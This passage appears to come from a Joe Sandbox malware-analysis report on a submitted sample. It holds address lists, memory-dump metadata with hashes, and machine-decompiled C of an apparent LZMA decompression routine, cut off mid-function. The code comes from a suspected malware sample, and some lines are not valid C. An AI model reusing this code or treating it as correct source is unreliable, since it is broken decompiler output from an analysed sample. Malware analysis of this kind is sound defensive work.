                                                                                                                0x004064d7
                                                                                                                0x004064da
                                                                                                                0x004064dc
                                                                                                                0x004064dc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040671e
                                                                                                                0x0040671e
                                                                                                                0x0040671e
                                                                                                                0x00406722
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406728
                                                                                                                0x0040672b
                                                                                                                0x0040672e
                                                                                                                0x00406731
                                                                                                                0x00406733
                                                                                                                0x00406733
                                                                                                                0x00406733
                                                                                                                0x00406736
                                                                                                                0x00406739
                                                                                                                0x0040673c
                                                                                                                0x0040673f
                                                                                                                0x00406742
                                                                                                                0x00406745
                                                                                                                0x00406746
                                                                                                                0x00406748
                                                                                                                0x00406748
                                                                                                                0x00406748
                                                                                                                0x0040674b
                                                                                                                0x0040674e
                                                                                                                0x00406751
                                                                                                                0x00406754
                                                                                                                0x00406757
                                                                                                                0x0040675b
                                                                                                                0x0040675d
                                                                                                                0x00406760
                                                                                                                0x00000000
                                                                                                                0x00406762
                                                                                                                0x004064df
                                                                                                                0x004064df
                                                                                                                0x00000000
                                                                                                                0x004064df
                                                                                                                0x00406760
                                                                                                                0x00406995
                                                                                                                0x004069b7
                                                                                                                0x004069bd
                                                                                                                0x004069bf
                                                                                                                0x004069c6
                                                                                                                0x004069c8
                                                                                                                0x004069cf
                                                                                                                0x004069d3
                                                                                                                0x00000000
                                                                                                                0x00405fc4
                                                                                                                0x004069cc
                                                                                                                0x004069cc
                                                                                                                0x00000000
                                                                                                                0x004069cc
                                                                                                                0x00406819
                                                                                                                0x0040689f
                                                                                                                0x004068a5
                                                                                                                0x004068a8
                                                                                                                0x004068ab
                                                                                                                0x004068ae
                                                                                                                0x004068b1
                                                                                                                0x004068b4
                                                                                                                0x004068b7
                                                                                                                0x004068ba
                                                                                                                0x004068c0
                                                                                                                0x004068d9
                                                                                                                0x004068dc
                                                                                                                0x004068df
                                                                                                                0x004068e2
                                                                                                                0x004068e6
                                                                                                                0x004068e8
                                                                                                                0x004068e9
                                                                                                                0x004068ec
                                                                                                                0x004068c2
                                                                                                                0x004068c2
                                                                                                                0x004068ca
                                                                                                                0x004068cf
                                                                                                                0x004068d1
                                                                                                                0x004068d4
                                                                                                                0x004068d4
                                                                                                                0x004068f6
                                                                                                                0x00000000
                                                                                                                0x004068f8
                                                                                                                0x00000000
                                                                                                                0x004068f8
                                                                                                                0x004068f6
                                                                                                                0x00000000
                                                                                                                0x0040676b

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d0b545a720d06a2780d8eb9310de1c164ea8e259f40aa19cdef3f662a7789f4d
                                                                                                                • Instruction ID: 868f2ec1f3ea74d7de1394d818727f69d5aca31e92bf34b5737afca42cfaef71
                                                                                                                • Opcode Fuzzy Hash: d0b545a720d06a2780d8eb9310de1c164ea8e259f40aa19cdef3f662a7789f4d
                                                                                                                • Instruction Fuzzy Hash: 6E913171D00229CBEF28CF98C8547ADBBB1FF44305F15812AD856BB281C7789A9ADF44
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040647D, Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 98%
                                                                                                                			E0040647D() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004069D4))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
